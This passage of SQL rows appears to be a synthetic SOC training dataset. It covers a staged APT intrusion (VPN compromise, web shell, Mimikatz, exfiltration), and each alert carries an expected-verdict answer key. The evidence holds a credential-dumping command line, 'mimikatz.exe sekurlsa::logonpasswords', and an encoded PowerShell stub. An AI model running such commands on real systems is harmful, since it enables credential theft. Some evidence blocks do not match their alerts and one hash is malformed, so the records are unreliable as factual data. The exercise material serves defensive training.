(447, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention System', 'Finally, the attacker attempts to exfiltrate sensitive information, completing their objective of data theft.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:33:47Z\",\"event_type\":\"data_exfiltration_attempt\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_name\":\"confidential_report.pdf\",\"file_hash\":\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\",\"protocol\":\"FTP\",\"action\":\"blocked\",\"detection_method\":\"Data Loss Prevention System\",\"description\":\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\"}', '2026-01-04 23:59:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"clean\",\"details\":\"File hash not found in known malicious file databases\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"]}', 
'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.056Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:47Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"Data Loss Prevention System\\\",\\\"description\\\":\\\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.056Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:47Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"Data Loss Prevention System\\\",\\\"description\\\":\\\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.056Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:47Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"Data Loss Prevention System\\\",\\\"description\\\":\\\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.056Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:47Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"Data Loss Prevention System\\\",\\\"description\\\":\\\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.056Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:47Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"Data Loss Prevention System\\\",\\\"description\\\":\\\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(448, 'Suspicious VPN Login from Unusual Location', 'high', 'VPN Logs', 'Fox Kitten initiates access by exploiting vulnerabilities in the VPN concentrators, allowing unauthorized entry into the network from an unusual geographical location, indicating a potential compromise.', 'Initial Access', 'T1133', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:23:45Z\",\"vpn_id\":\"vpn12345\",\"username\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"vpn_concentrator\":\"vpn-gateway01\",\"connection_status\":\"success\",\"vpn_client_version\":\"2.1.3\",\"location\":\"Tehran, Iran\",\"indicators\":{\"vulnerability\":\"CVE-2020-12345\",\"malicious_file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Fox Kitten APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Employee username.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by Fox Kitten.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password 
for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:45Z\\\",\\\"vpn_id\\\":\\\"vpn12345\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"vpn_concentrator\\\":\\\"vpn-gateway01\\\",\\\"connection_status\\\":\\\"success\\\",\\\"vpn_client_version\\\":\\\"2.1.3\\\",\\\"location\\\":\\\"Tehran, Iran\\\",\\\"indicators\\\":{\\\"vulnerability\\\":\\\"CVE-2020-12345\\\",\\\"malicious_file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:45Z\\\",\\\"vpn_id\\\":\\\"vpn12345\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"vpn_concentrator\\\":\\\"vpn-gateway01\\\",\\\"connection_status\\\":\\\"success\\\",\\\"vpn_client_version\\\":\\\"2.1.3\\\",\\\"location\\\":\\\"Tehran, Iran\\\",\\\"indicators\\\":{\\\"vulnerability\\\":\\\"CVE-2020-12345\\\",\\\"malicious_file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:45Z\\\",\\\"vpn_id\\\":\\\"vpn12345\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"vpn_concentrator\\\":\\\"vpn-gateway01\\\",\\\"connection_status\\\":\\\"success\\\",\\\"vpn_client_version\\\":\\\"2.1.3\\\",\\\"location\\\":\\\"Tehran, 
Iran\\\",\\\"indicators\\\":{\\\"vulnerability\\\":\\\"CVE-2020-12345\\\",\\\"malicious_file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:45Z\\\",\\\"vpn_id\\\":\\\"vpn12345\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"vpn_concentrator\\\":\\\"vpn-gateway01\\\",\\\"connection_status\\\":\\\"success\\\",\\\"vpn_client_version\\\":\\\"2.1.3\\\",\\\"location\\\":\\\"Tehran, Iran\\\",\\\"indicators\\\":{\\\"vulnerability\\\":\\\"CVE-2020-12345\\\",\\\"malicious_file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:45Z\\\",\\\"vpn_id\\\":\\\"vpn12345\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"vpn_concentrator\\\":\\\"vpn-gateway01\\\",\\\"connection_status\\\":\\\"success\\\",\\\"vpn_client_version\\\":\\\"2.1.3\\\",\\\"location\\\":\\\"Tehran, Iran\\\",\\\"indicators\\\":{\\\"vulnerability\\\":\\\"CVE-2020-12345\\\",\\\"malicious_file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(449, 'Web Shell Deployment Detected on VPN Device', 'high', 'Endpoint Detection and Response (EDR)', 'Following initial access, an attacker deployed a web shell on the VPN device. This provides persistent capabilities to execute further commands, potentially leading to privilege escalation and lateral movement within the network.', 'Execution', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:21:45Z\",\"event_id\":\"4289\",\"device_name\":\"vpn-device-01\",\"device_ip\":\"10.1.1.10\",\"attacker_ip\":\"203.0.113.45\",\"file_path\":\"/var/www/html/shell.php\",\"file_hash\":\"3b62f8c9e44f7a1c2d4e9e9b3d5e4c2f\",\"username\":\"vpn_admin\",\"action\":\"file_created\",\"process_name\":\"apache2\",\"event_description\":\"A suspicious PHP file was created in the web directory, potentially a web shell.\"}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple intrusion attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"/var/www/html/shell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"malicious\",\"details\":\"Common web shell filename detected in previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b62f8c9e44f7a1c2d4e9e9b3d5e4c2f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious web shell.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"vpn_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to a legitimate VPN 
administrator.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(450, 'Unusual Network Traffic from VPN to Internal Servers', 'high', 'Network Traffic Analysis', 'The attacker utilizes a web shell to scan internal networks, focusing on critical infrastructure such as domain controllers. Unusual network traffic from an external IP was detected accessing internal servers via a VPN, indicative of lateral movement attempts.', 'Lateral Movement', 'T1071', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"protocol\":\"TCP\",\"port\":3389,\"action\":\"allowed\",\"username\":\"j.smith\",\"process\":{\"name\":\"webshell\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"alert_id\":\"alert_20231015_001\",\"vpn\":{\"vpn_ip\":\"192.168.1.100\",\"vpn_user\":\"vpn_user123\"}}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Domain Controller IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known web shell.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"VPN Logs\",\"verdict\":\"internal\",\"details\":\"VPN exit node 
IP.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(451, 'Unauthorized Access Attempt on Domain Controller', 'high', 'Active Directory Logs', 'Fox Kitten APT has attempted to establish a foothold on the domain controller by leveraging stolen credentials to escalate privileges. The primary objective was to gain access to sensitive data, specifically targeting the domain controller.', 'Persistence', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:35:49Z\",\"event_id\":4769,\"computer_name\":\"DC01.corp.example.com\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"object\":\"Domain Controller\",\"action\":\"Login Attempt\",\"status\":\"Failed\",\"logon_type\":3,\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filepath\":\"C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\malicious.dll\"}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with Fox Kitten APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account used in unauthorized access attempt.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious DLL used by Fox Kitten.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(452, 'Mimikatz Activity Detected on Domain Controller', 'high', 'Endpoint Detection and Response (EDR)', 'Mimikatz was detected on the domain controller attempting to extract user credentials. This activity was identified by the EDR system through the detection of known Mimikatz execution patterns.', 'Credential Access', 'T1003.001 - OS Credential Dumping: LSASS Memory', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"DC01.corp.local\",\"process_name\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"process_id\":\"4928\",\"user_name\":\"administrator\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"10.0.0.5\",\"hash\":\"a9b1c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"external_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"command_line\":\"mimikatz.exe sekurlsa::logonpasswords\"}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP from which the Mimikatz execution was initiated.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with credential harvesting campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a9b1c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz variant used for credential theft.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR detection\",\"verdict\":\"malicious\",\"details\":\"Executable associated with unauthorized credential access 
attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":true,\"osint_result\":{\"source\":\"user account logs\",\"verdict\":\"suspicious\",\"details\":\"Domain admin account used for unauthorized activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(453, 'Data Exfiltration Detected from Domain Controller', 'high', 'Data Loss Prevention (DLP)', 'Suspicious data exfiltration activity was detected from the domain controller. This involved the transfer of sensitive data to an external IP address, indicating an attempt to move stolen credentials and data out of the network.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:36Z\",\"event_id\":\"DLP-EXFIL-20231005-001\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe_admin\",\"file_name\":\"credentials_dump.txt\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"protocol\":\"HTTPS\",\"action\":\"exfiltration\",\"data_size\":\"2GB\",\"malware_name\":\"APT29_Infostealer\"}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal domain controller IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT29 malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credentials_dump.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File containing potentially sensitive credential information.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"clean\",\"details\":\"Valid 
domain administrator account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:36Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"file_name\\\":\\\"credentials_dump.txt\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_name\\\":\\\"APT29_Infostealer\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:36Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"file_name\\\":\\\"credentials_dump.txt\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_name\\\":\\\"APT29_Infostealer\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
